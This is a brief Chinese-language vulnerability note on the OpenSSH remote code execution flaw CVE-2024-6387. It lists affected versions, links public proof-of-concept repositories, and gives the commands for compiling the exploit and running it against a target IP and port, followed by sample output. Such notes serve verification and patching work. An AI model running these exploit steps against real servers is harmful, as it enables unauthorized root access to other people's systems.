阅读量:0
0x01、漏洞名称
OpenSSH远程代码执行漏洞 (CVE-2024-6387)
0x02、漏洞简介
OpenSSH是SSH(Secure SHell)协议的开源实现,它通过不安全的网络在两个不受信任的主机之间提供安全的加密通信。OpenSSH 广泛用于基于Unix 的系统,通常用于安全远程登录和远程文件传输,以及其它网络服务。OpenSSH 远程代码执行漏洞(CVE-2024-6387),该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。
受影响版本:8.5p1 <= OpenSSH < 9.8p1
0x03、漏洞利用poc
https://github.com/zgzhang/cve-2024-6387-poc https://github.com/acrono/cve-2024-6387-poc https://github.com/lflare/cve-2024-6387-poc 0x04、漏洞验证
将poc编译成可执行文件
gcc -o exploit 7etsuo-regreSSHion.c 对目标进行验证
./exploit ip 端口 ./exploit 192.168.24.139 22 返回结果
Attempting exploitation with glibc base: 0xb7200000 Attempt 0 of 20000 Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4 Received KEX_INIT (1024 bytes) send_packet: Connection reset by peer 